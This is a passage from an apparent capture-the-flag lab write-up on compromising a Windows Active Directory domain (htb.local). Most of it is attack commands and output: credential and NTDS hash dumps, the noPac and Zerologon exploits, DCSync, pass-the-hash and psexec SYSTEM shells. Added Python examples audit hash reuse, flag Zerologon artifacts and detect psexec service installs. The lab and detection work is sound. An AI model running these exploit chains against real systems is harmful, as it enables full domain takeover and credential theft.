SMB         web.htb.local   445    WEB              NL$KM:6985d116bea614721b726a031eb0f10a74793d88de28b1c39016961eeb10af59fa5052840c25410c7a7c85e2add3ef52ae760126e2f8047aac1302d6fd9db183
SMB         web.htb.local   445    WEB              [+] Dumped 6 LSA secrets

❯ evil-winrm -i web.htb.local -u Administrator -p Myp@ssw0rd  
PS C:\Users\Administrator\Documents> whoami
web\administrator
PS C:\Users\Administrator\Documents>
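The root cause the whole Dominion chapter rests on is visible in the dumps above: WEB's local Administrator and the domain Administrator carry the same NT hash (e57231f8...), and Guest carries the hash of the empty password. The following added example, which is not from the write-up nor from crackmapexec or Impacket, parses secretsdump-style `user:rid:lm:nt:::` lines and reports exactly those two conditions; its input lines are copied from WEB's SAM dump above and from the first lines of DC1's NTDS dump shown in Extra 2.

```python
"""Two checks over secretsdump-style ``user:rid:lmhash:nthash:::`` lines:
accounts whose NT hash is that of the empty password, and NT hashes shared
between a host's local SAM and domain accounts (the reuse that lets the
write-up walk from WEB's local Administrator to the domain Administrator).

Added example, not part of the write-up nor of crackmapexec/Impacket.
The input lines are copied from the dumps shown on this page (WEB's SAM in
Extra 1, the first lines of DC1's NTDS in Extra 2).
"""
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash placeholder when LM is disabled

WEB_SAM = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

DC1_NTDS = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:161950868faef1197d2dd964966fc68f:::
iis-svc:1105:aad3b435b51404eeaad3b435b51404ee:98ccfeefb79abfbe15344b668c8bbafd:::
test-svc:1106:aad3b435b51404eeaad3b435b51404ee:f57c975264501a6649cd4e00d3f80f13:::
"""


def parse_dump(text: str) -> dict:
    """Map account name -> {'rid', 'lm', 'nt'}. Only the last whitespace-separated
    token of each line is inspected, so raw crackmapexec lines (with the
    'SMB host 445 NAME' prefix) parse as well; other lines are ignored."""
    accounts = {}
    for line in text.splitlines():
        tokens = line.strip().split()
        if not tokens:
            continue
        parts = tokens[-1].split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts[parts[0]] = {"rid": int(parts[1]), "lm": parts[2].lower(), "nt": parts[3].lower()}
    return accounts


def empty_password_accounts(accounts: dict) -> list:
    """Accounts whose NT hash is the empty password (Guest is normally
    disabled, so treat this as advisory for RID 501)."""
    return sorted(name for name, a in accounts.items() if a["nt"] == EMPTY_NT)


def lm_hashes_present(accounts: dict) -> list:
    """Accounts still storing a real LM hash (should be none on modern hosts)."""
    return sorted(name for name, a in accounts.items() if a["lm"] != EMPTY_LM)


def shared_nt_hashes(local: dict, domain: dict) -> list:
    """(local account, domain account) pairs with identical, non-empty NT hashes."""
    by_hash = {}
    for name, a in domain.items():
        if a["nt"] != EMPTY_NT:
            by_hash.setdefault(a["nt"], []).append(name)
    pairs = []
    for name, a in local.items():
        for dom_name in by_hash.get(a["nt"], []):
            pairs.append((name, dom_name))
    return sorted(pairs)


def audit(local_text: str = WEB_SAM, domain_text: str = DC1_NTDS) -> dict:
    """Run every check and return one report."""
    local, domain = parse_dump(local_text), parse_dump(domain_text)
    return {
        "local_empty_password": empty_password_accounts(local),
        "domain_empty_password": empty_password_accounts(domain),
        "lm_present": lm_hashes_present(local) + lm_hashes_present(domain),
        "shared_with_domain": shared_nt_hashes(local, domain),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

On the page's own data the report lists Guest as the only empty-password account in both dumps and the single pair (Administrator, Administrator) as a shared hash, which is the local-to-domain password reuse that Myp@ssw0rd turned out to be. LAPS, or at least distinct passwords for built-in local administrators, is the mitigation this check is meant to drive.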


Extra 2

CVE-2021-42278 / CVE-2021-42287 - DC1 Administrator


As an alternative we can use noPac; although the -shell parameter will not work directly, it does create a ticket as Administrator

❯ python3 noPac.py htb.local/bob:Passw0rd1! -use-ldap

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████

[*] Current ms-DS-MachineAccountQuota = 10
[-] Resolved Failed: The DNS query name does not exist: dc1.htb.local.
[*] Selected Target dc1.htb.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-WBRJLYTQFAZ$"
[*] MachineAccount "WIN-WBRJLYTQFAZ$" password = hc^Lj47SxvYl
[*] Successfully added machine account WIN-WBRJLYTQFAZ$ with password hc^Lj47SxvYl.
[*] WIN-WBRJLYTQFAZ$ object = CN=WIN-WBRJLYTQFAZ,CN=Computers,DC=htb,DC=local
[*] WIN-WBRJLYTQFAZ$ sAMAccountName == dc1
[*] Saving a DC's ticket in dc1.ccache
[*] Reseting the machine account to WIN-WBRJLYTQFAZ$
[*] Restored WIN-WBRJLYTQFAZ$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc1.htb.local.ccache
[*] Attempting to del a computer with the name: WIN-WBRJLYTQFAZ$
[-] Delete computer WIN-WBRJLYTQFAZ$ Failed! Maybe the current user does not have permission.  

❯ export KRB5CCNAME=Administrator_dc1.htb.local.ccache

At this point we can use the ticket to authenticate to DC1 and get a shell there directly, skipping all the other machines.

❯ impacket-psexec htb.local/Administrator@dc1.htb.local -k -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wYUrWrQH.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service MJBV on dc1.htb.local.....
[*] Starting service MJBV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>

Since we are authenticated as Administrator we can dump the NTDS (through the DRSUAPI replication interface) and obtain every NT hash in the domain, which we can then use for pass-the-hash.

❯ crackmapexec smb dc1.htb.local -k --use-kcache --ntds drsuapi
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\ from ccache (Pwn3d!)
SMB         dc1.htb.local   445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc1.htb.local   445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB         dc1.htb.local   445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc1.htb.local   445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:161950868faef1197d2dd964966fc68f:::
SMB         dc1.htb.local   445    DC1              iis-svc:1105:aad3b435b51404eeaad3b435b51404ee:98ccfeefb79abfbe15344b668c8bbafd:::
SMB         dc1.htb.local   445    DC1              test-svc:1106:aad3b435b51404eeaad3b435b51404ee:f57c975264501a6649cd4e00d3f80f13:::
SMB         dc1.htb.local   445    DC1              bob:1107:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
SMB         dc1.htb.local   445    DC1              lee:1108:aad3b435b51404eeaad3b435b51404ee:0e5a9749302e671fec9ab329b4b880d9:::
SMB         dc1.htb.local   445    DC1              kalle:1109:aad3b435b51404eeaad3b435b51404ee:b62bdf73a5ca2e921568450ab646c6bd:::
SMB         dc1.htb.local   445    DC1              htb.local\remote_user:10601:aad3b435b51404eeaad3b435b51404ee:a37f673dc55567c22d20f2045b688846:::  
SMB         dc1.htb.local   445    DC1              WEB$:1110:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB         dc1.htb.local   445    DC1              DEV$:1601:aad3b435b51404eeaad3b435b51404ee:01300a3009c7ae1af0ea216ebada48ad:::
SMB         dc1.htb.local   445    DC1              DC1$:2101:aad3b435b51404eeaad3b435b51404ee:c8261e7a49e363b8dc4087d21bf603a2:::
SMB         dc1.htb.local   445    DC1              WIN-WBRJLYTQFAZ$:15106:aad3b435b51404eeaad3b435b51404ee:1a12a5d765c7a6f9fbc1f74a6bb3f6

With the domain Administrator's NT hash we can authenticate to any computer joined to the domain; crackmapexec reports Pwn3d! on all three.

❯ crackmapexec smb 192.168.3.201-203 -u Administrator -H e57231f8ebcc24a122631564147361cc -k
SMB         192.168.3.201   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         192.168.3.202   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         192.168.3.203   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         192.168.3.201   445    DEV              [+] htb.local\Administrator:e57231f8ebcc24a122631564147361cc (Pwn3d!)
SMB         192.168.3.202   445    WEB              [+] htb.local\Administrator:e57231f8ebcc24a122631564147361cc (Pwn3d!)
SMB         192.168.3.203   445    DC1              [+] htb.local\Administrator:e57231f8ebcc24a122631564147361cc (Pwn3d!)


Extra 3

CVE-2020-1472 - DC1 Administrator


Another option is to run the Zerologon exploit against DC1. The server is vulnerable and the machine account password is set to an empty string. Keep in mind that this breaks DC1's Netlogon secure channel with the rest of the domain, so outside a lab the original machine account password has to be restored right after the secrets are dumped.

❯ python3 cve-2020-1472-exploit.py DC1 192.168.3.203
Performing authentication attempts...
==========================================================================  
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Authenticating as the DC1$ computer account with an empty password we can perform a DCSync and read the Administrator user's NT hash. The RemoteOperations error is expected (a computer account has no local admin rights on the DC, so the remote-registry path fails), but the drsuapi method only needs the replication rights that a domain controller account already holds.

❯ crackmapexec smb dc1.htb.local -u DC1$ -p '' --ntds drsuapi
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         dc1.htb.local   445    DC1              [+] htb.local\DC1$: 
SMB         dc1.htb.local   445    DC1              [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         dc1.htb.local   445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc1.htb.local   445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB         dc1.htb.local   445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc1.htb.local   445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:161950868faef1197d2dd964966fc68f:::
SMB         dc1.htb.local   445    DC1              iis-svc:1105:aad3b435b51404eeaad3b435b51404ee:98ccfeefb79abfbe15344b668c8bbafd:::
SMB         dc1.htb.local   445    DC1              test-svc:1106:aad3b435b51404eeaad3b435b51404ee:f57c975264501a6649cd4e00d3f80f13:::
SMB         dc1.htb.local   445    DC1              bob:1107:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
SMB         dc1.htb.local   445    DC1              lee:1108:aad3b435b51404eeaad3b435b51404ee:0e5a9749302e671fec9ab329b4b880d9:::
SMB         dc1.htb.local   445    DC1              kalle:1109:aad3b435b51404eeaad3b435b51404ee:b62bdf73a5ca2e921568450ab646c6bd:::
SMB         dc1.htb.local   445    DC1              htb.local\remote_user:10601:aad3b435b51404eeaad3b435b51404ee:a37f673dc55567c22d20f2045b688846:::  
SMB         dc1.htb.local   445    DC1              WEB$:1110:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB         dc1.htb.local   445    DC1              DEV$:1601:aad3b435b51404eeaad3b435b51404ee:a2c8507703354995745e5b9ea2ac0bd1:::
SMB         dc1.htb.local   445    DC1              DC1$:2101:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
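The two NTDS dumps on this page (the one taken with the noPac ticket and the one taken as DC1$ after Zerologon) differ exactly where it matters: DC1$ now carries 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password. The Python below is an added example, not part of the original writeup and not crackmapexec or impacket code: it parses secretsdump-style output (with or without the crackmapexec prefix), strips domain prefixes, skips damaged records such as the truncated WIN-WBRJLYTQFAZ$ line, flags accounts with an empty password and diffs two dumps. The sample input is the two dumps copied from this page with the tool prefix condensed.

```python
import re
from typing import Dict, List, Tuple

# Well-known values: the LM field printed when LM hashing is disabled, and the NT hash
# of an empty password (MD4 over the empty UTF-16LE string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump-style record: [domain\]name:rid:lm:nt:::  (anything before it, e.g. the
# "SMB host 445 NAME" prefix crackmapexec prints, is ignored)
_RECORD_RE = re.compile(
    r"(?:(?P<domain>[\w.-]+)\\)?(?P<name>[^\s:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)
# Looser shape, used only to spot records that are present but damaged (truncated hash)
_LOOSE_RE = re.compile(r"[^\s:\\]+:\d+:[0-9a-fA-F]+:[0-9a-fA-F]*")

Entry = Tuple[int, str, str]  # (rid, lm, nt)


def parse_ntds(text: str) -> Dict[str, Entry]:
    """Map account name -> (rid, lm, nt); domain prefixes are stripped, damaged lines skipped."""
    entries: Dict[str, Entry] = {}
    for line in text.splitlines():
        m = _RECORD_RE.search(line)
        if m:
            entries[m["name"]] = (int(m["rid"]), m["lm"].lower(), m["nt"].lower())
    return entries


def malformed_lines(text: str) -> List[str]:
    """Lines that look like hash records but fail strict validation (copy-paste truncation)."""
    return [ln for ln in text.splitlines() if _LOOSE_RE.search(ln) and not _RECORD_RE.search(ln)]


def empty_password_accounts(entries: Dict[str, Entry]) -> List[str]:
    """Accounts whose NT hash is the empty-password hash (Guest is normal; anything else is not)."""
    return sorted(name for name, (_, _, nt) in entries.items() if nt == EMPTY_NT)


def zerologon_indicators(entries: Dict[str, Entry]) -> List[str]:
    """Machine accounts ($) with an empty password: the artifact CVE-2020-1472 leaves on DC1$."""
    return [name for name in empty_password_accounts(entries) if name.endswith("$")]


def diff_dumps(before: Dict[str, Entry], after: Dict[str, Entry]) -> Dict[str, Tuple[str, str]]:
    """Accounts present in both dumps whose NT hash changed: name -> (old_nt, new_nt)."""
    return {
        name: (before[name][2], after[name][2])
        for name in before
        if name in after and before[name][2] != after[name][2]
    }


# Sample input: the two dumps from this page (prefix condensed), first one taken with the noPac ticket
DUMP_NOPAC = r"""
SMB  dc1.htb.local  445  DC1  Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB  dc1.htb.local  445  DC1  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB  dc1.htb.local  445  DC1  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:161950868faef1197d2dd964966fc68f:::
SMB  dc1.htb.local  445  DC1  iis-svc:1105:aad3b435b51404eeaad3b435b51404ee:98ccfeefb79abfbe15344b668c8bbafd:::
SMB  dc1.htb.local  445  DC1  test-svc:1106:aad3b435b51404eeaad3b435b51404ee:f57c975264501a6649cd4e00d3f80f13:::
SMB  dc1.htb.local  445  DC1  bob:1107:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
SMB  dc1.htb.local  445  DC1  lee:1108:aad3b435b51404eeaad3b435b51404ee:0e5a9749302e671fec9ab329b4b880d9:::
SMB  dc1.htb.local  445  DC1  kalle:1109:aad3b435b51404eeaad3b435b51404ee:b62bdf73a5ca2e921568450ab646c6bd:::
SMB  dc1.htb.local  445  DC1  htb.local\remote_user:10601:aad3b435b51404eeaad3b435b51404ee:a37f673dc55567c22d20f2045b688846:::
SMB  dc1.htb.local  445  DC1  WEB$:1110:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB  dc1.htb.local  445  DC1  DEV$:1601:aad3b435b51404eeaad3b435b51404ee:01300a3009c7ae1af0ea216ebada48ad:::
SMB  dc1.htb.local  445  DC1  DC1$:2101:aad3b435b51404eeaad3b435b51404ee:c8261e7a49e363b8dc4087d21bf603a2:::
SMB  dc1.htb.local  445  DC1  WIN-WBRJLYTQFAZ$:15106:aad3b435b51404eeaad3b435b51404ee:1a12a5d765c7a6f9fbc1f74a6bb3f6
"""

# Second dump, taken as DC1$ with the empty password after Zerologon
DUMP_ZEROLOGON = r"""
SMB  dc1.htb.local  445  DC1  Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB  dc1.htb.local  445  DC1  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB  dc1.htb.local  445  DC1  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:161950868faef1197d2dd964966fc68f:::
SMB  dc1.htb.local  445  DC1  iis-svc:1105:aad3b435b51404eeaad3b435b51404ee:98ccfeefb79abfbe15344b668c8bbafd:::
SMB  dc1.htb.local  445  DC1  test-svc:1106:aad3b435b51404eeaad3b435b51404ee:f57c975264501a6649cd4e00d3f80f13:::
SMB  dc1.htb.local  445  DC1  bob:1107:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
SMB  dc1.htb.local  445  DC1  lee:1108:aad3b435b51404eeaad3b435b51404ee:0e5a9749302e671fec9ab329b4b880d9:::
SMB  dc1.htb.local  445  DC1  kalle:1109:aad3b435b51404eeaad3b435b51404ee:b62bdf73a5ca2e921568450ab646c6bd:::
SMB  dc1.htb.local  445  DC1  htb.local\remote_user:10601:aad3b435b51404eeaad3b435b51404ee:a37f673dc55567c22d20f2045b688846:::
SMB  dc1.htb.local  445  DC1  WEB$:1110:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB  dc1.htb.local  445  DC1  DEV$:1601:aad3b435b51404eeaad3b435b51404ee:a2c8507703354995745e5b9ea2ac0bd1:::
SMB  dc1.htb.local  445  DC1  DC1$:2101:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    before, after = parse_ntds(DUMP_NOPAC), parse_ntds(DUMP_ZEROLOGON)
    print("damaged records in first dump:", malformed_lines(DUMP_NOPAC))
    print("empty passwords after Zerologon:", empty_password_accounts(after))
    print("machine accounts with empty password:", zerologon_indicators(after))
    for name, (old, new) in diff_dumps(before, after).items():
        print(f"{name}: {old} -> {new}")
```

Running it lists DC1$ as the only machine account with an empty password and shows two changed hashes between the dumps: DC1$ (the Zerologon reset) and DEV$, whose change the page does not explain (routine machine-password rotation is the usual cause, but that is an assumption). The truncated WIN-WBRJLYTQFAZ$ line is reported as damaged rather than silently imported with a bad hash.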

With the NT hash we can connect with psexec and get a shell as nt authority\system directly on DC1, with maximum privileges.

❯ impacket-psexec htb.local/Administrator@dc1.htb.local -hashes :e57231f8ebcc24a122631564147361cc -k  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file RfyqzLYf.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service IVdV on dc1.htb.local.....
[*] Starting service IVdV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>
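Both psexec sessions on this page leave the same trace on DC1: a service with a four-letter name (MJBV, IVdV) whose binary is an eight-letter .exe (wYUrWrQH.exe, RfyqzLYf.exe) uploaded through ADMIN$, which maps to %SystemRoot%. The Python below is an added detection example, not part of the original writeup and not impacket code: it runs that heuristic over constructed System-log 7045 (service installed) records, with field names as a SIEM might normalize them (an assumption); the %systemroot% image path is likewise assumed from the ADMIN$ upload.

```python
import re
from typing import Dict, Iterable, List

# Naming pattern taken from the psexec output on this page: a 4-letter service name and an
# 8-letter executable written to ADMIN$ (%SystemRoot%). Assumption: the service's image path
# is recorded as %systemroot%\<name>.exe or C:\Windows\<name>.exe.
_SERVICE_NAME_RE = re.compile(r"^[A-Za-z]{4}$")
_IMAGE_PATH_RE = re.compile(r"^(?:%systemroot%|c:\\windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)

Event = Dict[str, str]


def is_psexec_like_install(event: Event) -> bool:
    """System log 7045 (new service installed) whose name and binary fit the pattern above."""
    if event.get("EventID") != "7045":
        return False
    name_ok = bool(_SERVICE_NAME_RE.match(event.get("ServiceName", "")))
    path_ok = bool(_IMAGE_PATH_RE.match(event.get("ServiceFileName", "")))
    return name_ok and path_ok


def find_psexec_like_installs(events: Iterable[Event]) -> List[str]:
    """One line per suspicious install: host, service, binary and the user who installed it."""
    return [
        f'{e["Computer"]}: service {e["ServiceName"]} -> {e["ServiceFileName"]} (by {e["User"]})'
        for e in events
        if is_psexec_like_install(e)
    ]


# Constructed sample records (normalized fields; not logs taken from the page)
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "7045", "Computer": "dc1.htb.local", "ServiceName": "MJBV",
     "ServiceFileName": r"%systemroot%\wYUrWrQH.exe", "User": r"HTB\Administrator"},
    {"EventID": "7045", "Computer": "dc1.htb.local", "ServiceName": "IVdV",
     "ServiceFileName": r"%systemroot%\RfyqzLYf.exe", "User": r"HTB\Administrator"},
    # Legitimate install: neither the name nor the binary fits the pattern
    {"EventID": "7045", "Computer": "dev.htb.local", "ServiceName": "Sysmon64",
     "ServiceFileName": r"C:\Windows\Sysmon64.exe", "User": r"HTB\Administrator"},
    # Same service name but a state-change event (7036), not an install
    {"EventID": "7036", "Computer": "dc1.htb.local", "ServiceName": "MJBV",
     "ServiceFileName": "", "User": ""},
]

if __name__ == "__main__":
    for hit in find_psexec_like_installs(SAMPLE_EVENTS):
        print(hit)
```

The random names are impacket's defaults and psexec.py lets the operator override them with -service-name and -remote-binary-name, so a hit is a strong lead rather than proof, and a miss proves nothing. The service and its binary are removed when the psexec session ends, which makes the 7045 record the durable artifact to keep.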